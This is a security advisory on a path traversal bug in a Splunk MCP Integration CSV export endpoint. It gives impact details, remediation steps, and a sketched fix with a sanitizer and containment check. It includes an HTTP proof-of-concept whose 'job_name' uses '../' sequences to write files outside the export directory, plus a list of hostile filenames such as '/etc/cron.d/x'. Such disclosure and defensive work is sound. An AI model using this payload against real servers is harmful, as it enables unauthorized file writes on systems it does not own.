# Summary of Arbitrary File Write Vulnerability in Splunk MCP Integration CSV Export

## Vulnerability Overview

The CSV export service in Splunk MCP Integration contains a path traversal vulnerability. Attackers can bypass the `CSV_OUTPUT_DIR` restriction by crafting a malicious `job_name` parameter using `..` and `/` sequences, allowing them to create and write CSV files at arbitrary locations on the server.

## Impact Scope

- **Affected Versions**: Version `0.6.0.0` has been confirmed as affected.
- **Scope of Impact**: Revised versions of the CSV export service that follow the same `job_name` to `file_name` mapping process.
- **Severity**: CVSS v3.1 Score 7.1 (High)
- **Attack Prerequisites**: The attacker must possess the `csv_create` permission.

## Remediation

1. Replace the filename derived from `job_name` with an internal identifier, or sanitize `job_name` into a safe filename.
2. Resolve the final path after joining and reject any path that falls outside `Path(settings.CSV_OUTPUT_DIR).resolve()`.
3. Add regression tests covering `../`, nested slashes, Windows separators, and absolute path prefixes.

## POC Code

```http
POST /api/v1/export/ HTTP/1.1
Host: target-host
Authorization: Bearer
Content-Type: application/json

{
  "job_name": "../../../../../tmp/csv_poc",
  "data_source": {
    "source_type": "static",
    "static_source": {
      "data": [
        ["0001", "0a"]
      ]
    }
  },
  "export_config": {
    "export_format": "csv"
  }
}
```
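
The remediation steps above, sketched as an added example that is not the project's own code: an assumed unchecked `job_name` to filename mapping beside a sanitizing, containment-checked one, plus constructed regression inputs. All function names, the exception class and the sample names are hypothetical.

```python
import re
from pathlib import Path


class UnsafeExportPath(ValueError):
    """A job_name would place the CSV outside the export directory."""


def naive_export_path(output_dir, job_name):
    # Assumed shape of the weak mapping: job_name is joined with no check.
    return (Path(output_dir) / f"{job_name}.csv").resolve()


def is_inside(base, candidate):
    # True only when candidate is a file somewhere below base.
    return base in candidate.parents


def resolve_within(output_dir, file_name):
    # Remediation 2: resolve after joining, then require containment.
    base = Path(output_dir).resolve()
    candidate = (base / file_name).resolve()
    if not is_inside(base, candidate):
        raise UnsafeExportPath(f"{file_name!r} resolves outside {base}")
    return candidate


def sanitize_job_name(job_name):
    # Remediation 1: treat "/" and "\" alike, keep only the last component,
    # and reduce it to a conservative character set.
    last = job_name.replace("\\", "/").split("/")[-1]
    stem = re.sub(r"[^A-Za-z0-9_.-]+", "_", last).strip("._")
    if not stem:
        raise UnsafeExportPath(f"no usable filename in {job_name!r}")
    return stem


def safe_export_path(output_dir, job_name):
    return resolve_within(output_dir, sanitize_job_name(job_name) + ".csv")


# Constructed regression inputs for remediation 3: ../, nested slashes,
# Windows separators, and an absolute path prefix.
HOSTILE_NAMES = ["../../../../../tmp/csv_poc", "a/../../b", "..\\..\\evil", "/etc/cron.d/x"]
```

On POSIX the containment check alone accepts `..\..\evil` as a single odd filename inside the directory, which is why the sanitizer normalizes backslashes before the check rather than relying on `resolve()` to catch them.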